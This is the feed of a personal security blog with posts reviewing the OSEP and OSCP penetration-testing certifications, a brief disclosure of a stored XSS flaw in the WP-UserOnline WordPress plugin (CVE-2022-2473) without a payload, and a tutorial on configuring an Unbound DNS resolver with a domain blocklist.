Jekyll2023-12-16T21:24:15+00:00https://steffinstanly.github.io/feed.xmlSteffin StanlySecurity EnthusiastSteffin StanlyOSEP Review 20232023-06-14T00:00:00+00:002023-06-14T00:00:00+00:00https://steffinstanly.github.io/OSEP-Review-2023<p>Today, I’m thrilled to delve into one of the most sought-after certifications in the field of penetration testing: Offensive Security’s OSEP (Offensive Security Experienced Penetration Tester) certification. Having already achieved my OSCP (Offensive Security Certified Professional) certification, I decided to take the next step in my career and explore the depths of advanced techniques and evasive maneuvers through the OSEP course.</p>
<p>I will walk you through my journey, providing a comprehensive review of the Evasion Techniques and Breaching Defences video and PDF course that form the foundation of the OSEP certification. Furthermore, I will discuss the learning materials and platforms I utilized to fully prepare myself for the challenges that awaited me.</p>
<h2 id="background">Background </h2>
<p>Before starting the course, I had completed the <a href="https://www.hackthebox.com/hacker/pro-labs" target="_blank"><strong>Offshore Labs</strong></a> by HackTheBox which helped in giving me an understanding of Active Directory and various other tools. Although offshore lacks on the AV Evasion side, the OSEP course would be more than enough to compensate for that.
I would also recommend doing the <a href="https://www.alteredsecurity.com/post/certified-red-team-professional-crtp" target="_blank"><strong>CRTP</strong></a> certification.</p>
<h2 id="course">Course</h2>
<p>The course materials and labs were filled with content that was completely new to me; except for a few sections, most things were new to me, and this proved to be daunting initially, as I tried to comprehend everything. At one point, the 90 days weren’t enough, and I barely completed the last lab.</p>
<p>places where you could find information and help regarding the course.</p>
<ol>
<li><a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ" target="_blank">OffSec FAQs</a></li>
<li><a href="https://www.reddit.com/r/osep/" target="_blank">Reddit - OSEP</a></li>
<li><a href="https://discord.com/invite/offsec" target="_blank">OffSec - Discord</a></li>
<li><a href="https://forums.offensive-security.com/" target="_blank">OffSec - Forum</a></li>
</ol>
<p>You can get the full syllabus for OSEP (PEN-300) in <a href="https://www.offsec.com/courses/pen-300/download/syllabus" target="_blank"><strong>here</strong></a>.</p>
<p><a href="/images/osep/syllabus.png"><img src="/images/osep/syllabus.png" /></a></p>
<blockquote>
<p>What are the prerequisites for Evasion Techniques and Breaching Defenses?
All learners are recommended to have either taken Penetration Testing with Kali Linux (PEN-200) and passed the OSCP certification or have equivalent knowledge and skills. These skills include:</p>
<ul>
<li>Working familiarity with Kali Linux and the Linux command line</li>
<li>Solid ability in the enumeration of targets to identify vulnerabilities</li>
<li>Basic scripting abilities in Bash, Python, and PowerShell</li>
<li>Ability to identify and exploit vulnerabilities like SQL injection, file inclusion, and local privilege escalation</li>
<li>Foundational understanding of Active Directory and knowledge of basic AD attacks</li>
<li>Familiarity with C# programming is a plus for this course. </li>
</ul>
</blockquote>
<h2 id="resources--tools">Resources & Tools</h2>
<p>Most of the resources and tools listed here are based on my personal experience during the labs and exams. There are many other resources, but rather
In addition to the quantity, I have tried to focus on quality resources that have helped me.</p>
<p>I have added the whole set of notes as a cheat sheet for the OSEP course into a Git book:</p>
<p><a href="https://steffinstanly.gitbook.io/osep-notes/" target="_blank" style="display: inline-block; padding: 8px 16px; font-size: 14px; background-color: #1976d2; color: #fff; text-decoration: none; border-radius: 4px; transition: background-color 0.3s ease;" onmouseover="this.style.backgroundColor='#1565c0'" onmouseout="this.style.backgroundColor='#1976d2'">Steffin Stanly - OSEP Notes</a></p>
<ol>
<li><a href="https://github.com/chvancooten/OSEP-Code-Snippets" target="_blank">OSEP Code Snippets</a></li>
<li><a href="https://github.com/In3x0rabl3/OSEP" target="_blank">OSEP Notes</a></li>
<li><a href="https://mayfly277.github.io/posts/GOADv2/" target="_blank">Mayfly - Game Of Active Directory v2</a></li>
<li><a href="https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg" target="_blank">MindMap - Pentesting Active Directory</a></li>
<li><a href="https://hideandsec.sh/books/cheatsheets-82c/page/active-directory" target="_blank">CheatSheets - Active Directory</a></li>
<li><a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory" target="_blank">HackTricks - Linux Active Directory</a></li>
<li><a href="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" target="_blank">HackTricks - Active Directory Methodology</a></li>
<li><a href="https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/" target="_blank">Windows & Active Directory Exploitation Cheat Sheet</a></li>
</ol>
<p> </p>
<h2 id="what-you-should-know-prior">What You Should Know Prior</h2>
<p>Although the course delves into modern techniques and bypasses, it misses out on some basics. Maybe they require the learner to have a prior understanding of these as well, but since these tools and techniques are used extensively in the course, it would be better to add them as part of future updates.</p>
<ul>
<li><a href="https://github.com/byt3bl33d3r/CrackMapExec" target="_blank">CrackMapExec</a>: This would greatly help in identifying reusable passwords and credentials, and a lot more functionalities are available.</li>
<li><a href="https://github.com/BloodHoundAD/BloodHound" target="_blank">BloodHound</a>: Learn how to collect BloodHound data with SharpHound, analyze it, and discover lateral movement vectors.
<a href="https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/" target="_blank">PenTest Partners</a> has a great walkthrough.</li>
</ul>
<h2 id="osep-exam">OSEP Exam</h2>
<p>Before the exam, you need to ensure that you have checked all the requirements before beginning your exam. As usual, all the information can be found on the Offsec website <a href="https://help.offsec.com/hc/en-us/articles/360050293792-OSEP-Exam-Guide" target="_blank">here</a>.</p>
<p>The exam will last for 48 hours, as mentioned on the Offsec website. However, according to the website, the actual duration is 47 hours and 45 minutes. So mine started at 7 AM (May 18th) and ended around 7 AM (May 20th). As stated in one of the <a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ" target="_blank">FAQs</a> in Offsec website.</p>
<p>There are two ways you can pass the exam: either you achieve the objective provided on the control panel (secret.txt) or you obtain at least 100 points.</p>
<blockquote>
<p>:warning: <strong>1 Flag = 10 Points</strong>. So 10 Flags = 100 Points. Read the FAQs <a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ#h_01FSRPN7N18ZYS8Z5B8X3R6J51" target="_blank">here</a>.</p>
</blockquote>
<p>The most crucial thing is to make sure that you have recorded all relevant evidence, commands, and payloads. I used the Offsec-provided <a href="https://www.offensive-security.com/osep-online/OSEP-Exam-Report.docx" target="_blank">report template</a> for my final report, putting all the steps and supporting documentation into the format given.</p>
<h3 id="1-exam-attempt">#1 Exam Attempt</h3>
<p>I had taken my first attempt in March, which was disappointing as the exam machine was having issues after a while. I was able to own the first machine, but after a while, I was having trouble. After being stuck for more than 10 hours at a stretch and after trying N number of methods. I gave up hope and asked the support team to check my exam machine, which had been retested a couple of times prior, but this time they took longer to test and informed me the exam machine was having some issues.</p>
<p>They finally called off the attempt and gave me a free attempt in the future.</p>
<h3 id="2-exam-attempt">#2 Exam Attempt</h3>
<p>The second attempt was also not smooth, but the support team helped whenever I faced an issue. A couple of resets helped in places where things were supposed to work.</p>
<p>There are stablility issues overall as per my exam experience, I think offsec should try to correct this for the future as this is one of the advanced courses. The exam network being large, even the reset and support takes a significant time.</p>
<p>Overall, things were much better compared to first attempt, and I was able to complete the exam.</p>
<h2 id="wrapping-it-up">Wrapping it Up</h2>
<p>In the end, I stopped the exam with 11 flags and called it a day, since I was tired beyond anything. I started rechecking everything in the report to ensure I did not miss any screenshots or miss submitting any flags.</p>
<p>On May 23, 2023, I received the mail stating that I had passed OSEP. </p>
<p><a href="https://www.credential.net/41c9209b-8654-43ec-a98a-4d6c4bfae66a#gs.0mjm5g" target="_blank"><img src="https://api.accredible.com/v1/frontend/credential_website_embed_image/badge/74108782" alt="OSEP" /></a></p>
<p>Now that OSEP is completed, I want to continue on the red team path and complete <a href="https://training.zeropointsecurity.co.uk/courses/red-team-ops" target="_blank">CRTO</a>. <a href="https://maldevacademy.com/" target="_blank">Maldev Academy</a> is also a possible path. I might enroll in OSWE after these.</p>Steffin StanlyToday, I’m thrilled to delve into one of the most sought-after certifications in the field of penetration testing: Offensive Security’s OSEP (Offensive Security Experienced Penetration Tester) certification. Having already achieved my OSCP (Offensive Security Certified Professional) certification, I decided to take the next step in my career and explore the depths of advanced techniques and evasive maneuvers through the OSEP course.CVE-2022-2473 : WP-UserOnline <= 2.87.6 – Authenticated (Admin+) Stored Cross-Site Scripting2022-07-20T00:00:00+00:002022-07-20T00:00:00+00:00https://steffinstanly.github.io/CVE-2022-2473-WP-UserOnline<p>The WP-UserOnline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘templates[browsingpage]‘ parameter in versions up to, and including, 2.87.6 due to insufficient input sanitization and output escaping.</p>
<p>This makes it possible for authenticated attackers with administrative capabilities and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The only affects multi-site installations and installations where unfiltered_html is disabled.</p>
<p><a href="https://wordpress.org/plugins/wp-useronline/" target="_blank">WP-UserOnline</a></p>
<p>This plugin enables you to display how many users are online on your WordPress site, with detailed statistics of where they are and who they are (Members/Guests/Search Bots).</p>
<p><a href="https://patchstack.com/database/vulnerability/wp-useronline/wordpress-wp-useronline-plugin-2-87-6-authenticated-stored-cross-site-scripting-xss-vulnerability" target="_blank">CVE-2022-2473</a></p>
<h3 id="poc-video">POC Video:</h3>
<iframe width="560" height="315" src="https://www.youtube.com/embed/Q3zInrUnAV0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen=""></iframe>
<h3 id="vulnerable-code">Vulnerable Code:</h3>
<p><a href="https://github.com/lesterchan/wp-useronline" target="_blank">WP-UserOnline Github</a></p>
<p><a href="/images/CVE-2022-2473-WP-UserOnline/Vuln-code.PNG"><img src="/images/CVE-2022-2473-WP-UserOnline/Vuln-code.PNG" /></a></p>
<h3 id="remediated-code">Remediated Code:</h3>
<p><a href="/images/CVE-2022-2473-WP-UserOnline/fixed-code.PNG"><img src="/images/CVE-2022-2473-WP-UserOnline/fixed-code.PNG" /></a></p>
<ul>
<li><a href="https://github.com/lesterchan/wp-useronline/commit/7f42d65c93f1fac42b3783208921af592cfe8d3f" target="_blank">Github Commit</a></li>
</ul>
<h3 id="references">References:</h3>
<ul>
<li>
<p><a href="https://developer.wordpress.org/reference/functions/esc_url_raw/" target="_blank">esc_url_raw</a></p>
</li>
<li>
<p><a href="https://developer.wordpress.org/reference/functions/wp_kses_post/" target="_blank">wp_kses_post</a></p>
</li>
<li>
<p><a href="https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2473" target="_blank">Wordfence - CVE-2022-2473</a></p>
</li>
</ul>Steffin StanlyThe WP-UserOnline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘templates[browsingpage]‘ parameter in versions up to, and including, 2.87.6 due to insufficient input sanitization and output escaping.PWK and OSCP Review2021-07-20T00:00:00+00:002021-07-20T00:00:00+00:00https://steffinstanly.github.io/PWK-and-OSCP-Review<p>A journey that lasted for a couple of years, OSCP has always been a goal when I started my infosec journey. Met some great people on this wonderful journey,
who helped me greatly in improving my skills and in my personal growth. Finally, on September 28, 2020, I received the email which I have always dreamt about.</p>
<p>It was an ecstatic moment, after completing 2 months of gruesome labs and the newly updated course had more exercises which added to this greatly.
OSCP would be the toughest exam which I have given to date, After 24 hours of the Exam everything paid off finally.</p>
<h2 id="preparation">preparation</h2>
<p>I would recommend everyone to complete the <a href="https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0" target="_blank"><strong>TJ Null’s OSCP list</strong></a>”
before enrolling for the course. As multiple machines are quite similar to the OSCP labs.</p>
<p>One month before starting the lab time, I had completed most of the machines from TJ Null’s List and focused more on buffer overflow and privilege escalation.</p>
<p>The Udemy courses and Tryhackme rooms go hand in hand, the official materials lack a bit on the privilege escalation side and these courses would help in
overcoming those.</p>
<ul>
<li><a href="https://www.udemy.com/course/windows-privilege-escalation/" target="_blank">Windows Privilege Escalation for OSCP & Beyond! - Udemy Course</a>
<ul>
<li><a href="https://tryhackme.com/room/windows10privesc" target="_blank">Windows Privilege Escalation - TryHackMe Room</a></li>
</ul>
</li>
<li><a href="https://www.udemy.com/course/linux-privilege-escalation/" target="_blank">Linux Privilege Escalation for OSCP & Beyond! - Udemy Course</a>
<ul>
<li><a href="https://tryhackme.com/room/linuxprivesc" target="_blank">Linux Privilege Escalation - TryHackMe Room</a></li>
</ul>
</li>
<li><a href="https://github.com/justinsteven/dostackbufferoverflowgood" target="_blank">dostackbufferoverflowgood</a>
<ul>
<li><a href="https://tryhackme.com/room/bufferoverflowprep" target="_blank">Buffer Over Flow - TryHackMe Room</a></li>
</ul>
</li>
<li><a href="https://www.offensive-security.com/labs/individual/" target="_blank">Proving Grounds</a></li>
</ul>
<p>All these are extra materials that would help in greatly speeding up the lab completion.</p>
<blockquote>
<p>Penetration Testing with Kali Linux is a foundational security course, but still requires students to have certain knowledge before attending the online training class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required.
Familiarity with Bash scripting along with basic Perl or Python is considered a plus. This advanced penetration testing course is not for the faint of heart;
it requires practice, testing, and the ability to want to learn in a manner that will grow your career in the information security field and overcome any learning plateau.</p>
</blockquote>
<h2 id="resources--tools">Resources & Tools</h2>
<p>Most of the resources and tools listed here are based on my personal experience during the labs and exams. There are many other resources but rather
than the quantity, I have tried to focus on quality resources that helped me.</p>
<ul>
<li>Discord Group
<ul>
<li><a href="https://discord.com/invite/infosecprep" target="_blank">Infosec-prep</a></li>
</ul>
</li>
<li>Enumeration
<ul>
<li><a href="https://github.com/Tib3rius/AutoRecon" target="_blank">Autorecon</a></li>
<li><a href="https://github.com/21y4d/nmapAutomator" target="_blank">nmapAutomator</a></li>
<li><a href="https://sushant747.gitbooks.io/total-oscp-guide/content/list_of_common_ports.html" target="_blank">Common Ports</a></li>
</ul>
</li>
<li>Windows Privilege Escalation
<ul>
<li><a href="https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md" target="_blank">Windows Privilege Escalation - Checklist</a></li>
<li><a href="https://securism.wordpress.com/oscp-notes-privilege-escalation-windows/" target="_blank">Windows Privilege Escalation</a></li>
<li><a href="https://tryhackme.com/room/windows10privesc" target="_blank">Windows Privilege Escalation - TryHackMe Room</a> – This would help in greatly improving Privilege Escalation skills as it goes through all the available methods in much more depth.</li>
<li>Tools:
<ul>
<li><a href="https://github.com/Tib3rius/Windows-PrivEsc-Tools" target="_blank">Complete Set of Windows PrivEsc Tools</a></li>
<li><a href="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS" target="_blank">WinPEAS</a></li>
<li><a href="https://github.com/GhostPack/Seatbelt" target="_blank">Seatbelt</a></li>
<li><a href="https://github.com/bitsadmin/wesng" target="_blank">wesng</a></li>
<li><a href="https://github.com/ohpe/juicy-potato" target="_blank">Juicy Potato</a></li>
</ul>
</li>
</ul>
</li>
<li>Linux Privilege Escalation
<ul>
<li><a href="https://payatu.com/guide-linux-privilege-escalation" target="_blank">Linux Privilege Escalation</a></li>
<li><a href="https://pentestlab.blog/2017/09/25/suid-executables/" target="_blank">SUID List</a></li>
<li><a href="https://gtfobins.github.io/" target="_blank">GTFOBins</a></li>
<li><a href="https://tryhackme.com/room/linuxprivesc" target="_blank">Linux Privilege Escalation - TryHackMe Room</a> – Highly Recommended for improving Privilege Escalation skills</li>
<li>Tools:
<ul>
<li><a href="https://github.com/Tib3rius/Linux-PrivEsc-Tools" target="_blank">Complete Set of Linux PrivEsc Tools</a></li>
<li><a href="https://github.com/diego-treitos/linux-smart-enumeration" target="_blank">linux-smart-enumeration</a></li>
<li><a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" target="_blank">linPEAS</a></li>
</ul>
</li>
</ul>
</li>
<li>File Transfer Methods
<ul>
<li><a href="https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/" target="_blank">Windows File Transfer</a></li>
<li><a href="https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files.html" target="_blank">Linux File Transfer</a></li>
</ul>
</li>
<li>Buffer Over Flow
<ul>
<li><a href="https://github.com/justinsteven/dostackbufferoverflowgood" target="_blank">dostackbufferoverflowgood</a> – Best resource to start BOF from scratch</li>
<li><a href="https://github.com/Arken2/Everything-OSCP/blob/master/Checklists/WindowsBufferOverflowChecklist.pdf" target="_blank">Buffer Over Flow - Checklist</a></li>
<li><a href="https://tryhackme.com/room/bufferoverflowprep" target="_blank">Buffer Over Flow - TryHackMe Room</a> – Highly Recommended for identifying bad chars and for practice</li>
</ul>
</li>
<li>Exam Report Template
<ul>
<li><a href="https://github.com/whoisflynn/OSCP-Exam-Report-Template" target="_blank">Exam + Lab report</a></li>
</ul>
</li>
<li>Taking Notes
<ul>
<li><a href="https://github.com/giuspen/cherrytree" target="_blank">CherryTree</a></li>
<li><a href="https://github.com/laurent22/joplin" target="_blank">Joplin</a></li>
<li><a href="https://www.microsoft.com/en-us/microsoft-365/onenote/digital-note-taking-app" target="_blank">OneNote</a></li>
</ul>
</li>
<li>Mock Exam
<ul>
<li><a href="https://github.com/six2dez/OSCP-Human-Guide/blob/master/README.md#exam-mockups" target="_blank">OSCP Mock Exam Machines</a></li>
</ul>
</li>
</ul>
<h2 id="oscp-exam">OSCP Exam</h2>
<p>The dreaded 24 hours, after getting cold feet for a couple of times in booking the slot for the exam, I finally scheduled the exam. I made a backup of my VM in case something goes wrong. Read through all the rules regarding the exam and kept a backup power supply and internet. Wrote down most of the general stuff in the report
and created skeleton code for Buffer Overflow. To pass OSCP a minimum score of 70/100 is required and each machine has different points.
I highly suggest you read the <a href="https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide" target="_blank">OSCP Exam Guide</a> for more details on what is and isn’t allowed during the exam.</p>
<p>To gain additional 5 points before the exam, you can submit a lab report consisting of 10 unique OSCP lab machines and a selected number of exercises from the materials.
This lab report is submitted together with the exam report.</p>
<ul>
<li>
<p>Machine 1 [Buffer Overflow 25 pts] -
I started my exam at 8 AM after completing the proctoring procedures and completed the Buffer Overflow Machine by 9 AM, I had parallelly taken all the screenshots and wrote vague
steps in the report, to avoid any confusion later on.</p>
<p>Started to enumerate all the other 4 machines in the background, so I can save time and when I am done with the BOF machine and I can start to work on the other machines
Immediately.</p>
</li>
<li>
<p>Machine 2 [20 pts] -
Enumeration provided me the breakthrough and got the limited shell, after tinkering for 1-2 hours got the root shell by 1 PM, took a break after this machine, and had lunch.</p>
</li>
<li>
<p>Machine 3 [20 pts] -
Limited shell was attained without much sweat but root shell proved to be a headache and current point total stood at 60 when the lab report 5 points are included.
It was 6 PM and I started to get a dreaded feeling that I might not be able to complete it and I kept on enumerating further and with no luck, I switched over to the
25 pointer and 10 pointer machines and even these machines proved futile. So took a much-needed break and came back and got the root shell by 9:30 PM. The total now stood at 70 and I was happy to gain the passing points.</p>
</li>
<li>
<p>Machine 4 [10 pts] -
I had to make sure of the passing score as there is a possibility of getting the 5 points rejected If I made any mistakes on my lab report. So to get a guaranteed pass
I started to work on the 10 pointer and got the root shell by 11:30 PM. Now I was thrilled about getting 80 points and completing OSCP. All the hard work proved to be worthwhile
at that moment. Took a break and played the <a href="https://www.offensive-security.com/offsec/say-try-harder/" target="_blank">Try Harder</a> song and enjoyed the moment for a while.</p>
</li>
</ul>
<p>After laying down for a few minutes almost dozed off due to exhaustion and thought to complete the exam report and started to write the report by 2 AM, I had skipped the 25 pointer machine and focused on checking whether all the screenshots are there or not, as failure to do the exam report would result in failure. I had to retake a couple of screenshots to make the report was detailed enough. After 22 hours of exam time, Everything was re-checked and the exam report and lab report was sent in the specified format.</p>
<h2 id="wrapping-it-up">Wrapping it Up</h2>
<p>In the end, the lab report was 226 pages long and the Exam report was 40 pages long, Most of my time during the lab period was lost in completing the lab report. But in the end, I had got 75 points even without the lab report. The lab report was too long and was not worth it for the 5 points, but many were failing in the borderline 65 points and this forced me to do the lab report.</p>
<p>I called it a day by 6 AM, after rechecking for any mistakes and sending the reports out. It was a wonderful journey that boosted my confidence in facing any challenges in the future.</p>
<p>On September 28, 2020, I received the mail stating that I had passed OSCP. Almost 6-7 days after completing the Exam.</p>
<div data-iframe-width="250" data-iframe-height="270" data-share-badge-id="6fd420ed-eafb-48ed-bff4-e442bcf5df15" data-share-badge-host="https://www.credly.com"></div>
<script type="text/javascript" async="" src="//cdn.credly.com/assets/utilities/embed.js"></script>
<p>As of writing, I am currently vacillating between a couple of certifications and my next target from offsec side would be <a href="https://www.offensive-security.com/awae-oswe/" target="_blank">OSWE</a>.</p>
<h3 id="exam-tips">Exam Tips:</h3>
<ul>
<li>Use Autorecon for enumeration.</li>
<li>Take Breaks in between.</li>
<li>Take screenshots and notes parallelly, don’t wait till the end.</li>
<li>Start with BOF and enumerate other machines in the background.</li>
<li>Try the obvious things, without trying you won’t know the output.</li>
<li>Switch machine when there is no progress.</li>
<li>Have proper intake of water and food.</li>
<li>Having some weird idea and doubting it? try it, who knows it might work out.</li>
<li>Take proper rest before the exam.</li>
<li>Have proper notes, everything should be a copy-paste away.</li>
<li>Keep notes organized and have a skeleton code for BOF.</li>
<li>Have an outline for the exam report.</li>
</ul>Steffin StanlyA journey that lasted for a couple of years, OSCP has always been a goal when I started my infosec journey. Met some great people on this wonderful journey, who helped me greatly in improving my skills and in my personal growth. Finally, on September 28, 2020, I received the email which I have always dreamt about.Unbound DNS Blocking2019-02-21T00:00:00+00:002019-02-21T00:00:00+00:00https://steffinstanly.github.io/Unbound-DNS-Blocking<p>Today we will learn how to create our own recursive DNS server using Unbound.
This will improve performance through caching. We will also look at blocking unwanted pages.</p>
<p>Download the Official Unbound DNS files from the <strong>Github</strong> Repository which is given here “<a href="https://github.com/NLnetLabs/unbound"><strong>NLnetLabs-unbound</strong></a>”</p>
<p class="notice--warning"><strong>WARNING:</strong> I am by no means an expert in Unbound DNS! I tried to explain about Unbound DNS set up the best way I could, and I’m sure I might have made a few mistakes here and there. So if a mistake was made or something is misleading, then please let me know in the comments section!</p>
<p>Step 1: Install Unbound</p>
<p>The Unbound package is included in the base repositories for most Linux distributions, installing separate repositories is usually not necessary.</p>
<p>ON UBUNTU</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>apt-get update <span class="o">&&</span> apt-get <span class="nb">install</span> <span class="nt">-y</span> unbound
</code></pre></div></div>
<p>ON CENTOS</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>yum <span class="nb">install</span> <span class="nt">-y</span> unbound
</code></pre></div></div>
<p>Step 2:
ON UBUNTU</p>
<p>Change /etc/unbound/unbound.conf:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">include: /etc/unbound/unbound.conf.d/*.conf
</span></code></pre></div></div>
<p>ON CENT OS</p>
<p>Change /etc/unbound/unbound.conf:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">include: /etc/unbound/conf.d/*.conf
</span></code></pre></div></div>
<p>Next, we will enable unbound</p>
<p><a href="/images/unbound-dns/unbound-1.png"><img src="/images/unbound-dns/unbound-1.png" /></a></p>
<p>After the package has been installed, make a copy of the unbound configuration file before making any changes to the original file.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span><span class="nb">cp</span> /etc/unbound/unbound.conf /etc/unbound/unbound.conf.original
</code></pre></div></div>
<p>Next, use any of your favourite text editor to open and edit ‘unbound.conf‘ configuration file.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>vi /etc/unbound/unbound.conf
</code></pre></div></div>
<h2 id="enable-ipv4-and-protocol-supports">Enable IPv4 and Protocol Supports</h2>
<p>Search for the following string and make it ‘Yes‘.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">do-ip4: yes
do-udp yes
do-tcp: yes
</span></code></pre></div></div>
<h2 id="enable-the-logging">Enable the logging</h2>
<p>To enable the log, add the variable as below, it will log every unbound activities.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">logfile: /var/log/unbound
</span></code></pre></div></div>
<h2 id="hide-identity-and-version">Hide Identity and Version</h2>
<p>Enable the following parameters to hide id.server and hostname.bind queries.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">hide-identity: yes
</span></code></pre></div></div>
<p>Enable the following parameter to hide version. server and version.bind queries.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">hide-version: yes
</span></code></pre></div></div>
<p>Include the block file path to the unbound.conf file to set up the block list for unbound.</p>
<p><a href="/images/unbound-dns/unbound-2.png"><img src="/images/unbound-dns/unbound-2.png" /></a></p>
<p class="notice--info"><strong>NOTE</strong>: Change the resolv.conf IP to the interface IP if you are running Unbound Locally in your system</p>
<p>Add the system or server IP to the interfaces list</p>
<p><a href="/images/unbound-dns/unbound-3.png"><img src="/images/unbound-dns/unbound-3.png" /></a></p>
<p>By default, the port is 53 if change is required just edit the port number</p>
<p class="notice--info"><strong>NOTE</strong>: check whether any other process is using that port using the command <strong>netstat -tunlp</strong></p>
<p><a href="/images/unbound-dns/unbound-4.png"><img src="/images/unbound-dns/unbound-4.png" /></a></p>
<p>Next, Change the access control for our interface IP network</p>
<p><a href="/images/unbound-dns/unbound-5.png"><img src="/images/unbound-dns/unbound-5.png" /></a></p>
<p>Forward zones is where the IP is forwarded after requesting our local server. After the request has been made to our server the recursive call is made to the ISP’s DNS server.</p>
<p><a href="/images/unbound-dns/unbound-6.png"><img src="/images/unbound-dns/unbound-6.png" /></a></p>
<p>After making the above configuration, now let’s verify the unbound.conf file for any errors using the following command</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-checkconf /etc/unbound/unbound.conf
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-7.png"><img src="/images/unbound-dns/unbound-7.png" /></a></p>
<p>After verifying the file without any errors, you can safely restart the ‘unbound’ service and enable it at system startup.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>systemctl start unbound.service
<span class="gp">#</span><span class="w"> </span><span class="nb">sudo </span>systemctl <span class="nb">enable </span>unbound.service
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-8.png"><img src="/images/unbound-dns/unbound-8.png" /></a></p>
<h2 id="blocklist-file">Blocklist File</h2>
<p class="notice--info"><strong>NOTE</strong>: Inside the block.conf always start with <strong>server:</strong> on top of the file</p>
<p>The Blocklist can be created as a static list or you could fetch the website list from various repositories which cater sites list. One such list which I found useful was “<a href="https://github.com/StevenBlack/hosts"><strong>StevenBlack</strong></a>” Github Repo where he has a well-curated block list from various sources.</p>
<p>All the Blocklist entries are having the same format, so we can use our custom scripts to fetch the list and change it to our need. For updating our list daily we could run our script as a <strong>cronjob</strong></p>
<p><a href="/images/unbound-dns/unbound-9.png"><img src="/images/unbound-dns/unbound-9.png" /></a></p>
<h2 id="dns-cache-setup">DNS CACHE SETUP</h2>
<p><strong>Test DNS Cache Locally</strong></p>
<p>Now it’s time to check our DNS cache, by doing a ‘drill’ (query) on ‘india.com‘ domain. At first, the ‘drill‘ command results for ‘india.com‘ domain will take some milliseconds, and then do a second drill and have a note on Query time it takes for both drills.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">drill india.com @192.168.0.50
</span></code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-10.png"><img src="/images/unbound-dns/unbound-10.png" /></a></p>
<p>As you can see in the above output, the first query taken almost 262 ms to resolve and the second query takes 0 ms to resolve domain (india.com).
That means, the first query gets cached in our DNS Cache, so when we run ‘drill’ second time the query is served from our local DNS cache, this way we can improve loading speed of websites.</p>
<h2 id="flush-iptables-and-add-firewalld-rules">Flush Iptables and Add Firewalld Rules</h2>
<p>We can’t use both iptables and firewalld at same time on the same machine if we do both will conflict with each other, thus removing ipables rules will be a good idea. To remove or flush the iptables, use the following command.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>iptables <span class="nt">-F</span>
</code></pre></div></div>
<p>After removing iptables rules permanently, now add the DNS service to firewalld list permanently.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>firewall-cmd <span class="nt">--add-service</span><span class="o">=</span>dns
<span class="gp">#</span><span class="w"> </span>firewall-cmd <span class="nt">--add-service</span><span class="o">=</span>dns <span class="nt">--permanent</span>
</code></pre></div></div>
<p>After adding DNS service rules, list the rules and confirm.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>firewall-cmd <span class="nt">--list-all</span>
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-11.png"><img src="/images/unbound-dns/unbound-11.png" /></a></p>
<h2 id="managing-and-troubleshooting-unbound">Managing and Troubleshooting Unbound</h2>
<p>To get the current server status, use the following command.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control status
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-12.png"><img src="/images/unbound-dns/unbound-12.png" /></a></p>
<h2 id="flushing-dns-records">Flushing DNS Records</h2>
<p>To check whether the specific address was resolved by our forwarders in unbound cache Server, use the command given below.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control lookup google.com
</code></pre></div></div>
